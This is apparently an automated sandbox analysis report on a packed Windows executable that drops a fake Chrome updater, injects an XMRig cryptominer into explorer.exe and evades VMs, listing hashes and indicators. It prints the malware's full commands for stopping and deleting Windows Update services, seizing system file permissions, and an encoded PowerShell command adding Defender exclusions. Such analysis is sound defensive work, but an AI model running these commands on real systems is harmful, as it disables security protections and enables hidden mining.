Analysis
-
max time kernel
300s -
max time network
290s -
platform
windows10-1703_x64 -
resource
win10-20220722-en -
resource tags
arch:x64arch:x86image:win10-20220722-enlocale:en-usos:windows10-1703-x64system -
submitted
03-08-2022 22:15
Behavioral task
behavioral1
Sample
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
Resource
win7-20220718-en
General
-
Target
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
-
Size
7.1MB
-
MD5
322cf2f6a67420e4eb53f29263a639ba
-
SHA1
bc91f56c260ff4484f7fb0d33a3d351d3d812781
-
SHA256
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025
-
SHA512
3e58b83f26950059901ad1cbb20a06351b7a815d17a3e65a0a84061b7d0d9af588a2685786c28642b1bb76575c81b272d10a1b1dede515b643b27ea52deadcc7
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
updater.exe1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe -
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3832-470-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3832-471-0x000000014036EAC4-mapping.dmp xmrig behavioral2/memory/3832-472-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3832-475-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3832-478-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3832-487-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1304 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4520 takeown.exe 4728 icacls.exe 928 takeown.exe 632 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
updater.exe1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 928 takeown.exe 632 icacls.exe 4520 takeown.exe 4728 icacls.exe -
Processes:
resource yara_rule behavioral2/memory/4956-127-0x0000000000400000-0x000000000106F000-memory.dmp themida behavioral2/memory/4956-128-0x0000000000400000-0x000000000106F000-memory.dmp themida behavioral2/memory/4956-130-0x0000000000400000-0x000000000106F000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral2/memory/1304-276-0x0000000000400000-0x000000000106F000-memory.dmp themida behavioral2/memory/1304-275-0x0000000000400000-0x000000000106F000-memory.dmp themida behavioral2/memory/1304-280-0x0000000000400000-0x000000000106F000-memory.dmp themida -
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.EXEpowershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exeupdater.exepid process 4956 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe 1304 updater.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 4648 set thread context of 3832 4648 conhost.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe powershell.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe powershell.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3144 sc.exe 3156 sc.exe 820 sc.exe 384 sc.exe 3300 sc.exe 2976 sc.exe 4504 sc.exe 1448 sc.exe 3964 sc.exe 1964 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.EXEconhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 2300 reg.exe 4868 reg.exe 2148 reg.exe 1780 reg.exe 1648 reg.exe 4728 reg.exe 4884 reg.exe 4480 reg.exe 3040 reg.exe 1068 reg.exe 1168 reg.exe 4748 reg.exe 1748 reg.exe 5012 reg.exe 4884 reg.exe 1276 reg.exe 652 reg.exe 4132 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.exepowershell.EXEpowershell.execonhost.exeexplorer.exepid process 5064 powershell.exe 5064 powershell.exe 5064 powershell.exe 4968 conhost.exe 3956 powershell.exe 3956 powershell.exe 3956 powershell.exe 2236 powershell.EXE 2236 powershell.EXE 2236 powershell.EXE 2836 powershell.exe 2836 powershell.exe 2836 powershell.exe 4648 conhost.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe 3832 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 636 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowercfg.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 5064 powershell.exe Token: SeIncreaseQuotaPrivilege 5064 powershell.exe Token: SeSecurityPrivilege 5064 powershell.exe Token: SeTakeOwnershipPrivilege 5064 powershell.exe Token: SeLoadDriverPrivilege 5064 powershell.exe Token: SeSystemProfilePrivilege 5064 powershell.exe Token: SeSystemtimePrivilege 5064 powershell.exe Token: SeProfSingleProcessPrivilege 5064 powershell.exe Token: SeIncBasePriorityPrivilege 5064 powershell.exe Token: SeCreatePagefilePrivilege 5064 powershell.exe Token: SeBackupPrivilege 5064 powershell.exe Token: SeRestorePrivilege 5064 powershell.exe Token: SeShutdownPrivilege 5064 powershell.exe Token: SeDebugPrivilege 5064 powershell.exe Token: SeSystemEnvironmentPrivilege 5064 powershell.exe Token: SeRemoteShutdownPrivilege 5064 powershell.exe Token: SeUndockPrivilege 5064 powershell.exe Token: SeManageVolumePrivilege 5064 powershell.exe Token: 33 5064 powershell.exe Token: 34 5064 powershell.exe Token: 35 5064 powershell.exe Token: 36 5064 powershell.exe Token: SeShutdownPrivilege 1916 powercfg.exe Token: SeCreatePagefilePrivilege 1916 powercfg.exe Token: SeShutdownPrivilege 4184 powercfg.exe Token: SeCreatePagefilePrivilege 4184 powercfg.exe Token: SeShutdownPrivilege 4236 powercfg.exe Token: SeCreatePagefilePrivilege 4236 powercfg.exe Token: SeDebugPrivilege 4968 conhost.exe Token: SeShutdownPrivilege 2396 powercfg.exe Token: SeCreatePagefilePrivilege 2396 powercfg.exe Token: SeTakeOwnershipPrivilege 4520 takeown.exe Token: SeDebugPrivilege 3956 powershell.exe Token: SeIncreaseQuotaPrivilege 3956 powershell.exe Token: SeSecurityPrivilege 3956 powershell.exe Token: SeTakeOwnershipPrivilege 3956 powershell.exe Token: SeLoadDriverPrivilege 3956 powershell.exe Token: SeSystemProfilePrivilege 3956 powershell.exe Token: SeSystemtimePrivilege 3956 powershell.exe Token: SeProfSingleProcessPrivilege 3956 powershell.exe Token: SeIncBasePriorityPrivilege 3956 powershell.exe Token: SeCreatePagefilePrivilege 3956 powershell.exe Token: SeBackupPrivilege 3956 powershell.exe Token: SeRestorePrivilege 3956 powershell.exe Token: SeShutdownPrivilege 3956 powershell.exe Token: SeDebugPrivilege 3956 powershell.exe Token: SeSystemEnvironmentPrivilege 3956 powershell.exe Token: SeRemoteShutdownPrivilege 3956 powershell.exe Token: SeUndockPrivilege 3956 powershell.exe Token: SeManageVolumePrivilege 3956 powershell.exe Token: 33 3956 powershell.exe Token: 34 3956 powershell.exe Token: 35 3956 powershell.exe Token: 36 3956 powershell.exe Token: SeIncreaseQuotaPrivilege 3956 powershell.exe Token: SeSecurityPrivilege 3956 powershell.exe Token: SeTakeOwnershipPrivilege 3956 powershell.exe Token: SeLoadDriverPrivilege 3956 powershell.exe Token: SeSystemProfilePrivilege 3956 powershell.exe Token: SeSystemtimePrivilege 3956 powershell.exe Token: SeProfSingleProcessPrivilege 3956 powershell.exe Token: SeIncBasePriorityPrivilege 3956 powershell.exe Token: SeCreatePagefilePrivilege 3956 powershell.exe Token: SeBackupPrivilege 3956 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.execonhost.execmd.execmd.exedescription pid process target process PID 4956 wrote to memory of 4968 4956 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe conhost.exe PID 4956 wrote to memory of 4968 4956 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe conhost.exe PID 4956 wrote to memory of 4968 4956 1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe conhost.exe PID 4968 wrote to memory of 5064 4968 conhost.exe powershell.exe PID 4968 wrote to memory of 5064 4968 conhost.exe powershell.exe PID 4968 wrote to memory of 5092 4968 conhost.exe cmd.exe PID 4968 wrote to memory of 5092 4968 conhost.exe cmd.exe PID 4968 wrote to memory of 1224 4968 conhost.exe cmd.exe PID 4968 wrote to memory of 1224 4968 conhost.exe cmd.exe PID 5092 wrote to memory of 1964 5092 cmd.exe sc.exe PID 5092 wrote to memory of 1964 5092 cmd.exe sc.exe PID 1224 wrote to memory of 1916 1224 cmd.exe powercfg.exe PID 1224 wrote to memory of 1916 1224 cmd.exe powercfg.exe PID 5092 wrote to memory of 3300 5092 cmd.exe sc.exe PID 5092 wrote to memory of 3300 5092 cmd.exe sc.exe PID 5092 wrote to memory of 2976 5092 cmd.exe sc.exe PID 5092 wrote to memory of 2976 5092 cmd.exe sc.exe PID 5092 wrote to memory of 3144 5092 cmd.exe sc.exe PID 5092 wrote to memory of 3144 5092 cmd.exe sc.exe PID 5092 wrote to memory of 3156 5092 cmd.exe sc.exe PID 5092 wrote to memory of 3156 5092 cmd.exe sc.exe PID 5092 wrote to memory of 4132 5092 cmd.exe reg.exe PID 5092 wrote to memory of 4132 5092 cmd.exe reg.exe PID 1224 wrote to memory of 4184 1224 cmd.exe powercfg.exe PID 1224 wrote to memory of 4184 1224 cmd.exe powercfg.exe PID 1224 wrote to memory of 4236 1224 cmd.exe powercfg.exe PID 1224 wrote to memory of 4236 1224 cmd.exe powercfg.exe PID 5092 wrote to memory of 1748 5092 cmd.exe reg.exe PID 5092 wrote to memory of 1748 5092 cmd.exe reg.exe PID 1224 wrote to memory of 2396 1224 cmd.exe powercfg.exe PID 1224 wrote to memory of 2396 1224 cmd.exe powercfg.exe PID 5092 wrote to memory of 5012 5092 cmd.exe reg.exe PID 5092 wrote to memory of 5012 5092 cmd.exe reg.exe PID 5092 wrote to memory of 3040 5092 cmd.exe reg.exe PID 5092 wrote to memory of 3040 5092 cmd.exe reg.exe PID 5092 wrote to memory of 4480 5092 cmd.exe reg.exe PID 5092 wrote to memory of 4480 5092 cmd.exe reg.exe PID 5092 wrote to memory of 4520 5092 cmd.exe takeown.exe PID 5092 wrote to memory of 4520 5092 cmd.exe takeown.exe PID 5092 wrote to memory of 4728 5092 cmd.exe icacls.exe PID 5092 wrote to memory of 4728 5092 cmd.exe icacls.exe PID 4968 wrote to memory of 3956 4968 conhost.exe powershell.exe PID 4968 wrote to memory of 3956 4968 conhost.exe powershell.exe PID 5092 wrote to memory of 4884 5092 cmd.exe reg.exe PID 5092 wrote to memory of 4884 5092 cmd.exe reg.exe PID 5092 wrote to memory of 2148 5092 cmd.exe reg.exe PID 5092 wrote to memory of 2148 5092 cmd.exe reg.exe PID 5092 wrote to memory of 1780 5092 cmd.exe reg.exe PID 5092 wrote to memory of 1780 5092 cmd.exe reg.exe PID 5092 wrote to memory of 1648 5092 cmd.exe reg.exe PID 5092 wrote to memory of 1648 5092 cmd.exe reg.exe PID 5092 wrote to memory of 1668 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 1668 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 2764 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 2764 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 2768 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 2768 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 4264 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 4264 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 4260 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 4260 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 2540 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 2540 5092 cmd.exe schtasks.exe PID 5092 wrote to memory of 2344 5092 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBhAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZwBuACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
